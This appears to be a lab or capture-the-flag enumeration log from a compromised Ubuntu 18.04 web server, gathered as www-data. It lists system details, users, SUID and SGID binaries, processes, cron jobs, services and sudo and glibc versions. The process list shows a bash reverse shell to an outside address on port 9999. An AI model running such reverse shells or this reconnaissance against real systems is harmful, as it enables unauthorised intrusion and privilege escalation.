System/Kernel
www-data@reconstruction:~/blog$ file /bin/bash ; uname -a ; cat /etc/*release
/bin/bash: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=b636f50d85c3cca7cf2518030446660c1d90d660, stripped
Linux reconstruction 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04 LTS"
NAME="Ubuntu"
VERSION="18.04 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic64-bit
Ubuntu 18.04 LTS (Bionic Beaver)
4.15.0-20-generic
Networks
www-data@reconstruction:~/blog$ ip route ; arp -a
default via 192.168.209.254 dev ens160 proto static
192.168.209.0/24 dev ens160 proto kernel scope link src 192.168.209.103
_gateway (192.168.209.254) at 00:50:56:9e:72:00 [ether] on ens160www-data@reconstruction:~/blog$ netstat -antup4
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 1116/python3.6
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 192.168.209.103:8080 192.168.45.215:34968 ESTABLISHED 1177/python3.6
tcp 0 141 192.168.209.103:40512 192.168.45.215:9999 ESTABLISHED 1456/bash
udp 16128 0 127.0.0.53:53 0.0.0.0:* - Users & Groups
www-data@reconstruction:~/blog$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
ftp:x:111:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
jack:x:1001:1001::/home/jack:/bin/bash
netplan:x:63434:63434:netplan daemon user,,,:/var/lib/plan/netplan.dir:/usr/sbin/nologin
total 12K
4.0K drwxr-xr-x 3 root root 4.0K Sep 30 2020 .
4.0K drwxr-xr-x 3 root root 4.0K Sep 30 2020 jack
4.0K drwxr-xr-x 23 root root 4.0K Sep 30 2020 ..jack
www-data@reconstruction:~/blog$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=106(uuidd) gid=110(uuidd) groups=110(uuidd)
uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=108(landscape) gid=112(landscape) groups=112(landscape)
uid=109(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=110(pollinate) gid=1(daemon) groups=1(daemon)
uid=111(ftp) gid=115(ftp) groups=115(ftp)
uid=1001(jack) gid=1001(jack) groups=1001(jack)
uid=63434(netplan) gid=63434(netplan) groups=63434(netplan)uid=1001(jack) gid=1001(jack) groups=1001(jack)
SUIDs
www-data@reconstruction:~/blog$ find / -perm -04000 -ls -type f 2>/dev/null
56 43 -rwsr-xr-x 1 root root 43088 Sep 16 2020 /snap/core18/1932/bin/mount
65 63 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /snap/core18/1932/bin/ping
81 44 -rwsr-xr-x 1 root root 44664 Mar 22 2019 /snap/core18/1932/bin/su
99 27 -rwsr-xr-x 1 root root 26696 Sep 16 2020 /snap/core18/1932/bin/umount
1704 75 -rwsr-xr-x 1 root root 76496 Mar 22 2019 /snap/core18/1932/usr/bin/chfn
1706 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /snap/core18/1932/usr/bin/chsh
1759 75 -rwsr-xr-x 1 root root 75824 Mar 22 2019 /snap/core18/1932/usr/bin/gpasswd
1823 40 -rwsr-xr-x 1 root root 40344 Mar 22 2019 /snap/core18/1932/usr/bin/newgrp
1836 59 -rwsr-xr-x 1 root root 59640 Mar 22 2019 /snap/core18/1932/usr/bin/passwd
1927 146 -rwsr-xr-x 1 root root 149080 Jan 31 2020 /snap/core18/1932/usr/bin/sudo
2014 42 -rwsr-xr-- 1 root systemd-resolve 42992 Jun 11 2020 /snap/core18/1932/usr/lib/dbus-1.0/dbus-daemon-launch-helper
2324 427 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /snap/core18/1932/usr/lib/openssh/ssh-keysign
56 43 -rwsr-xr-x 1 root root 43088 Mar 5 2020 /snap/core18/1885/bin/mount
65 63 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /snap/core18/1885/bin/ping
81 44 -rwsr-xr-x 1 root root 44664 Mar 22 2019 /snap/core18/1885/bin/su
99 27 -rwsr-xr-x 1 root root 26696 Mar 5 2020 /snap/core18/1885/bin/umount
1698 75 -rwsr-xr-x 1 root root 76496 Mar 22 2019 /snap/core18/1885/usr/bin/chfn
1700 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /snap/core18/1885/usr/bin/chsh
1752 75 -rwsr-xr-x 1 root root 75824 Mar 22 2019 /snap/core18/1885/usr/bin/gpasswd
1816 40 -rwsr-xr-x 1 root root 40344 Mar 22 2019 /snap/core18/1885/usr/bin/newgrp
1828 59 -rwsr-xr-x 1 root root 59640 Mar 22 2019 /snap/core18/1885/usr/bin/passwd
1919 146 -rwsr-xr-x 1 root root 149080 Jan 31 2020 /snap/core18/1885/usr/bin/sudo
2006 42 -rwsr-xr-- 1 root systemd-resolve 42992 Jun 11 2020 /snap/core18/1885/usr/lib/dbus-1.0/dbus-daemon-launch-helper
2314 427 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /snap/core18/1885/usr/lib/openssh/ssh-keysign
66 40 -rwsr-xr-x 1 root root 40152 Jan 27 2020 /snap/core/10126/bin/mount
80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/10126/bin/ping
81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/10126/bin/ping6
98 40 -rwsr-xr-x 1 root root 40128 Mar 25 2019 /snap/core/10126/bin/su
116 27 -rwsr-xr-x 1 root root 27608 Jan 27 2020 /snap/core/10126/bin/umount
2608 71 -rwsr-xr-x 1 root root 71824 Mar 25 2019 /snap/core/10126/usr/bin/chfn
2610 40 -rwsr-xr-x 1 root root 40432 Mar 25 2019 /snap/core/10126/usr/bin/chsh
2686 74 -rwsr-xr-x 1 root root 75304 Mar 25 2019 /snap/core/10126/usr/bin/gpasswd
2778 39 -rwsr-xr-x 1 root root 39904 Mar 25 2019 /snap/core/10126/usr/bin/newgrp
2791 53 -rwsr-xr-x 1 root root 54256 Mar 25 2019 /snap/core/10126/usr/bin/passwd
2901 134 -rwsr-xr-x 1 root root 136808 Jan 31 2020 /snap/core/10126/usr/bin/sudo
3000 42 -rwsr-xr-- 1 root systemd-resolve 42992 Jun 11 2020 /snap/core/10126/usr/lib/dbus-1.0/dbus-daemon-launch-helper
3370 419 -rwsr-xr-x 1 root root 428240 May 26 2020 /snap/core/10126/usr/lib/openssh/ssh-keysign
6432 109 -rwsr-xr-x 1 root root 110792 Sep 29 2020 /snap/core/10126/usr/lib/snapd/snap-confine
7610 386 -rwsr-xr-- 1 root dip 394984 Jul 23 2020 /snap/core/10126/usr/sbin/pppd
66 40 -rwsr-xr-x 1 root root 40152 Jan 27 2020 /snap/core/10185/bin/mount
80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/10185/bin/ping
81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/10185/bin/ping6
98 40 -rwsr-xr-x 1 root root 40128 Mar 25 2019 /snap/core/10185/bin/su
116 27 -rwsr-xr-x 1 root root 27608 Jan 27 2020 /snap/core/10185/bin/umount
2610 71 -rwsr-xr-x 1 root root 71824 Mar 25 2019 /snap/core/10185/usr/bin/chfn
2612 40 -rwsr-xr-x 1 root root 40432 Mar 25 2019 /snap/core/10185/usr/bin/chsh
2689 74 -rwsr-xr-x 1 root root 75304 Mar 25 2019 /snap/core/10185/usr/bin/gpasswd
2781 39 -rwsr-xr-x 1 root root 39904 Mar 25 2019 /snap/core/10185/usr/bin/newgrp
2794 53 -rwsr-xr-x 1 root root 54256 Mar 25 2019 /snap/core/10185/usr/bin/passwd
2904 134 -rwsr-xr-x 1 root root 136808 Jan 31 2020 /snap/core/10185/usr/bin/sudo
3003 42 -rwsr-xr-- 1 root systemd-resolve 42992 Jun 11 2020 /snap/core/10185/usr/lib/dbus-1.0/dbus-daemon-launch-helper
3375 419 -rwsr-xr-x 1 root root 428240 May 26 2020 /snap/core/10185/usr/lib/openssh/ssh-keysign
6437 109 -rwsr-xr-x 1 root root 110792 Oct 8 2020 /snap/core/10185/usr/lib/snapd/snap-confine
7615 386 -rwsr-xr-- 1 root dip 394984 Jul 23 2020 /snap/core/10185/usr/sbin/pppd
652888 44 -rwsr-xr-x 1 root root 44664 Jan 25 2018 /bin/su
652905 28 -rwsr-xr-x 1 root root 26696 Mar 15 2018 /bin/umount
652861 44 -rwsr-xr-x 1 root root 43088 Mar 15 2018 /bin/mount
664875 144 -rwsr-xr-x 1 root root 146128 Nov 30 2017 /bin/ntfs-3g
664872 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
652870 64 -rwsr-xr-x 1 root root 64424 Mar 9 2017 /bin/ping
653169 148 -rwsr-xr-x 1 root root 149080 Jan 17 2018 /usr/bin/sudo
666833 24 -rwsr-xr-x 1 root root 22520 Mar 27 2018 /usr/bin/pkexec
653078 40 -rwsr-xr-x 1 root root 40344 Jan 25 2018 /usr/bin/newgrp
666810 40 -rwsr-xr-x 1 root root 37136 Jan 25 2018 /usr/bin/newuidmap
666809 40 -rwsr-xr-x 1 root root 37136 Jan 25 2018 /usr/bin/newgidmap
666374 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
666155 20 -rwsr-xr-x 1 root root 18448 Mar 9 2017 /usr/bin/traceroute6.iputils
653089 60 -rwsr-xr-x 1 root root 59640 Jan 25 2018 /usr/bin/passwd
652956 44 -rwsr-xr-x 1 root root 44528 Jan 25 2018 /usr/bin/chsh
652954 76 -rwsr-xr-x 1 root root 76496 Jan 25 2018 /usr/bin/chfn
653019 76 -rwsr-xr-x 1 root root 75824 Jan 25 2018 /usr/bin/gpasswd
666212 428 -rwsr-xr-x 1 root root 436552 Feb 9 2018 /usr/lib/openssh/ssh-keysign
666836 16 -rwsr-xr-x 1 root root 14328 Mar 27 2018 /usr/lib/policykit-1/polkit-agent-helper-1
797643 80 -rwsr-xr-x 1 root root 80056 Apr 2 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
653280 44 -rwsr-xr-- 1 root messagebus 42992 Nov 15 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
666907 100 -rwsr-sr-x 1 root root 101208 Apr 16 2018 /usr/lib/snapd/snap-confine
653290 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device 666833 24 -rwsr-xr-x 1 root root 22520 Mar 27 2018 /usr/bin/pkexec
666836 16 -rwsr-xr-x 1 root root 14328 Mar 27 2018 /usr/lib/policykit-1/polkit-agent-helper-1
SGIDs
www-data@reconstruction:~/blog$ find / -type f -perm -02000 -ls 2>/dev/null
1633 34 -rwxr-sr-x 1 root shadow 34816 Jul 21 2020 /snap/core18/1932/sbin/pam_extrausers_chkpwd
1662 34 -rwxr-sr-x 1 root shadow 34816 Jul 21 2020 /snap/core18/1932/sbin/unix_chkpwd
1699 71 -rwxr-sr-x 1 root shadow 71816 Mar 22 2019 /snap/core18/1932/usr/bin/chage
1744 23 -rwxr-sr-x 1 root shadow 22808 Mar 22 2019 /snap/core18/1932/usr/bin/expiry
1920 355 -rwxr-sr-x 1 root crontab 362640 Mar 4 2019 /snap/core18/1932/usr/bin/ssh-agent
1984 31 -rwxr-sr-x 1 root tty 30800 Sep 16 2020 /snap/core18/1932/usr/bin/wall
1631 34 -rwxr-sr-x 1 root shadow 34816 Feb 27 2019 /snap/core18/1885/sbin/pam_extrausers_chkpwd
1660 34 -rwxr-sr-x 1 root shadow 34816 Feb 27 2019 /snap/core18/1885/sbin/unix_chkpwd
1693 71 -rwxr-sr-x 1 root shadow 71816 Mar 22 2019 /snap/core18/1885/usr/bin/chage
1738 23 -rwxr-sr-x 1 root shadow 22808 Mar 22 2019 /snap/core18/1885/usr/bin/expiry
1912 355 -rwxr-sr-x 1 root crontab 362640 Mar 4 2019 /snap/core18/1885/usr/bin/ssh-agent
1976 31 -rwxr-sr-x 1 root tty 30800 Mar 5 2020 /snap/core18/1885/usr/bin/wall
2526 35 -rwxr-sr-x 1 root shadow 35632 Apr 9 2018 /snap/core/10126/sbin/pam_extrausers_chkpwd
2566 35 -rwxr-sr-x 1 root shadow 35600 Apr 9 2018 /snap/core/10126/sbin/unix_chkpwd
2603 61 -rwxr-sr-x 1 root shadow 62336 Mar 25 2019 /snap/core/10126/usr/bin/chage
2623 36 -rwxr-sr-x 1 root systemd-network 36080 Apr 5 2016 /snap/core/10126/usr/bin/crontab
2652 15 -rwxr-sr-x 1 root mail 14856 Dec 6 2013 /snap/core/10126/usr/bin/dotlockfile
2664 23 -rwxr-sr-x 1 root shadow 22768 Mar 25 2019 /snap/core/10126/usr/bin/expiry
2761 15 -rwxr-sr-x 3 root mail 14592 Dec 3 2012 /snap/core/10126/usr/bin/mail-lock
2761 15 -rwxr-sr-x 3 root mail 14592 Dec 3 2012 /snap/core/10126/usr/bin/mail-touchlock
2761 15 -rwxr-sr-x 3 root mail 14592 Dec 3 2012 /snap/core/10126/usr/bin/mail-unlock
2894 351 -rwxr-sr-x 1 root crontab 358624 May 26 2020 /snap/core/10126/usr/bin/ssh-agent
2959 27 -rwxr-sr-x 1 root tty 27368 Jan 27 2020 /snap/core/10126/usr/bin/wall
2528 35 -rwxr-sr-x 1 root shadow 35632 Apr 9 2018 /snap/core/10185/sbin/pam_extrausers_chkpwd
2568 35 -rwxr-sr-x 1 root shadow 35600 Apr 9 2018 /snap/core/10185/sbin/unix_chkpwd
2605 61 -rwxr-sr-x 1 root shadow 62336 Mar 25 2019 /snap/core/10185/usr/bin/chage
2625 36 -rwxr-sr-x 1 root systemd-network 36080 Apr 5 2016 /snap/core/10185/usr/bin/crontab
2654 15 -rwxr-sr-x 1 root mail 14856 Dec 6 2013 /snap/core/10185/usr/bin/dotlockfile
2666 23 -rwxr-sr-x 1 root shadow 22768 Mar 25 2019 /snap/core/10185/usr/bin/expiry
2764 15 -rwxr-sr-x 3 root mail 14592 Dec 3 2012 /snap/core/10185/usr/bin/mail-lock
2764 15 -rwxr-sr-x 3 root mail 14592 Dec 3 2012 /snap/core/10185/usr/bin/mail-touchlock
2764 15 -rwxr-sr-x 3 root mail 14592 Dec 3 2012 /snap/core/10185/usr/bin/mail-unlock
2897 351 -rwxr-sr-x 1 root crontab 358624 May 26 2020 /snap/core/10185/usr/bin/ssh-agent
2962 27 -rwxr-sr-x 1 root tty 27368 Jan 27 2020 /snap/core/10185/usr/bin/wall
391763 36 -rwxr-sr-x 1 root shadow 34816 Apr 5 2018 /sbin/unix_chkpwd
391739 36 -rwxr-sr-x 1 root shadow 34816 Apr 5 2018 /sbin/pam_extrausers_chkpwd
652965 40 -rwxr-sr-x 1 root crontab 39352 Nov 16 2017 /usr/bin/crontab
666192 44 -rwxr-sr-x 1 root mlocate 43088 Mar 1 2018 /usr/bin/mlocate
653004 24 -rwxr-sr-x 1 root shadow 22808 Jan 25 2018 /usr/bin/expiry
652951 72 -rwxr-sr-x 1 root shadow 71816 Jan 25 2018 /usr/bin/chage
666374 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
664825 16 -rwxr-sr-x 1 root tty 14328 Jan 17 2018 /usr/bin/bsd-write
653226 32 -rwxr-sr-x 1 root tty 30800 Mar 15 2018 /usr/bin/wall
666205 356 -rwxr-sr-x 1 root ssh 362640 Feb 9 2018 /usr/bin/ssh-agent
666407 12 -rwxr-sr-x 1 root utmp 10232 Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
666907 100 -rwsr-sr-x 1 root root 101208 Apr 16 2018 /usr/lib/snapd/snap-confineProcesses
www-data@reconstruction:~/blog$ ps -auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.4 77620 9012 ? Ss 00:35 0:00 /sbin/init
root 506 0.0 0.7 94776 14328 ? S<s 00:35 0:00 /lib/systemd/systemd-journald
root 512 0.0 0.0 105904 1952 ? Ss 00:35 0:00 /sbin/lvmetad -f
root 521 0.1 0.3 52156 7056 ? Ss 00:35 0:01 /lib/systemd/systemd-udevd
systemd+ 566 0.0 0.1 141908 3292 ? Ssl 00:35 0:00 /lib/systemd/systemd-timesyncd
systemd+ 571 0.0 0.2 71816 5312 ? Ss 00:35 0:00 /lib/systemd/systemd-networkd
systemd+ 575 0.0 0.2 70608 5276 ? Ss 00:35 0:00 /lib/systemd/systemd-resolved
root 624 0.0 0.0 25376 288 ? Ss 00:35 0:00 /sbin/iscsid
root 625 0.0 0.2 25880 5260 ? S<Ls 00:35 0:00 /sbin/iscsid
root 688 0.0 0.5 91148 10784 ? Ss 00:35 0:00 /usr/bin/VGAuthService
root 689 0.0 0.3 227036 7540 ? S<sl 00:35 0:00 /usr/bin/vmtoolsd
syslog 931 0.0 0.2 263036 4848 ? Ssl 00:35 0:00 /usr/sbin/rsyslogd -n
message+ 933 0.0 0.2 50056 4448 ? Ss 00:35 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 937 0.0 0.3 287524 7032 ? Ssl 00:35 0:00 /usr/lib/accountsservice/accounts-daemon
root 938 0.0 0.1 31320 3192 ? Ss 00:35 0:00 /usr/sbin/cron -f
daemon 940 0.0 0.1 28332 2420 ? Ss 00:35 0:00 /usr/sbin/atd -f
root 945 0.0 1.4 637856 29880 ? Ssl 00:35 0:00 /usr/lib/snapd/snapd
root 946 0.0 0.0 604916 1692 ? Ssl 00:35 0:00 /usr/bin/lxcfs /var/lib/lxcfs/
root 960 0.0 0.3 70584 6164 ? Ss 00:35 0:00 /lib/systemd/systemd-logind
root 968 0.0 0.1 29148 2964 ? Ss 00:35 0:00 /usr/sbin/vsftpd /etc/vsftpd.conf
root 1095 0.0 0.2 72296 5752 ? Ss 00:35 0:00 /usr/sbin/sshd -D
root 1097 0.0 0.1 16180 2084 tty1 Ss+ 00:35 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 1098 0.0 0.3 288868 6712 ? Ssl 00:35 0:00 /usr/lib/policykit-1/polkitd --no-debug
www-data 1116 0.0 1.5 92700 30792 ? Ss 00:35 0:00 /usr/bin/python3.6 app.py
www-data 1177 0.1 1.6 392244 32864 ? Sl 00:35 0:01 /usr/bin/python3.6 /var/www/blog/app.py
uuidd 1189 0.0 0.0 28136 1404 ? Ss 00:35 0:00 /usr/sbin/uuidd --socket-activation
www-data 1454 0.0 0.0 4628 884 ? S 00:43 0:00 sh -c bash -c "bash -i >& /dev/tcp/192.168.45.215/9999 0>&1"
www-data 1455 0.0 0.1 21340 3664 ? S 00:43 0:00 bash -c bash -i >& /dev/tcp/192.168.45.215/9999 0>&1
www-data 1456 0.0 0.1 21472 3960 ? S 00:43 0:00 bash -i
www-data 1506 0.0 0.0 16392 1084 ? S 00:49 0:00 ping 192.168.209.254
www-data 1509 0.0 0.0 4628 772 ? S 00:49 0:00 sh -c bash -c "bash -i >& /dev/tcp/192.168.45.215/9999 0>&1"
www-data 1510 0.0 0.1 21340 3708 ? S 00:49 0:00 bash -c bash -i >& /dev/tcp/192.168.45.215/9999 0>&1
www-data 1511 0.0 0.2 21472 4084 ? S 00:49 0:00 bash -i
www-data 1602 0.0 0.1 39664 3692 ? R 00:51 0:00 ps -auxwwwroot 624 0.0 0.0 25376 288 ? Ss 00:35 0:00 /sbin/iscsid
root 938 0.0 0.1 31320 3192 ? Ss 00:35 0:00 /usr/sbin/cron -f
root 945 0.0 1.4 637856 29880 ? Ssl 00:35 0:00 /usr/lib/snapd/snapd
root 968 0.0 0.1 29148 2964 ? Ss 00:35 0:00 /usr/sbin/vsftpd /etc/vsftpd.conf
root 1098 0.0 0.3 288868 6712 ? Ssl 00:35 0:00 /usr/lib/policykit-1/polkitd --no-debug
www-data 1177 0.1 1.6 392244 32864 ? Sl 00:35 0:01 /usr/bin/python3.6 /var/www/blog/app.py
Cron & Systemd
www-data@reconstruction:~/blog$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for www-data
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
NEXT LEFT LAST PASSED UNIT ACTIVATES
Fri 2025-02-07 01:09:42 EST 16min left Wed 2020-09-30 12:21:58 EDT 4 years 4 months ago motd-news.timer motd-news.service
Fri 2025-02-07 06:29:07 EST 5h 35min left Fri 2025-02-07 00:34:53 EST 18min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Fri 2025-02-07 14:42:04 EST 13h left Fri 2025-02-07 00:34:52 EST 18min ago apt-daily.timer apt-daily.service
Sat 2025-02-08 00:51:04 EST 23h left Fri 2025-02-07 00:51:04 EST 2min 7s ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Mon 2025-02-10 00:00:00 EST 2 days left Fri 2025-02-07 00:34:50 EST 18min ago fstrim.timer fstrim.service
5 timers listed.
Pass --all to see loaded but inactive timers, too.Services
www-data@reconstruction:~/blog$ systemctl list-units --state=running
UNIT LOAD ACTIVE SUB DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point
init.scope loaded active running System and Service Manager
accounts-daemon.service loaded active running Accounts Service
atd.service loaded active running Deferred execution scheduler
blog.service loaded active running Flask Blog
cron.service loaded active running Regular background program processing daemon
dbus.service loaded active running D-Bus System Message Bus
getty@tty1.service loaded active running Getty on tty1
iscsid.service loaded active running iSCSI initiator daemon (iscsid)
lvm2-lvmetad.service loaded active running LVM2 metadata daemon
lxcfs.service loaded active running FUSE filesystem for LXC
open-vm-tools.service loaded active running Service for virtual machines hosted on VMware
polkit.service loaded active running Authorization Manager
rsyslog.service loaded active running System Logging Service
snapd.service loaded active running Snappy daemon
ssh.service loaded active running OpenBSD Secure Shell server
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running Login Service
systemd-networkd.service loaded active running Network Service
systemd-resolved.service loaded active running Network Name Resolution
systemd-timesyncd.service loaded active running Network Time Synchronization
systemd-udevd.service loaded active running udev Kernel Device Manager
unattended-upgrades.service loaded active running Unattended Upgrades Shutdown
uuidd.service loaded active running Daemon for generating UUIDs
vgauth.service loaded active running Authentication service for virtual machines hosted on VMware
vsftpd.service loaded active running vsftpd FTP server
dbus.socket loaded active running D-Bus System Message Bus Socket
lvm2-lvmetad.socket loaded active running LVM2 metadata daemon socket
snapd.socket loaded active running Socket activation for snappy daemon
syslog.socket loaded active running Syslog Socket
systemd-journald-audit.socket loaded active running Journal Audit Socket
systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log)
systemd-journald.socket loaded active running Journal Socket
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket loaded active running udev Kernel Socket
uuidd.socket loaded active running UUID daemon activation socket
LOAD = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB = The low-level unit activation state, values depend on unit type.
36 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.blog.service
cron.service
iscsid.service
polkit.service
Sudo Version
www-data@reconstruction:~/blog$ sudo --version
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2Sudo version 1.8.21p2
Glibc Version
www-data@reconstruction:~/blog$ ldd --version
ldd (Ubuntu GLIBC 2.27-3ubuntu1) 2.27
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.ldd (Ubuntu GLIBC 2.27-3ubuntu1) 2.27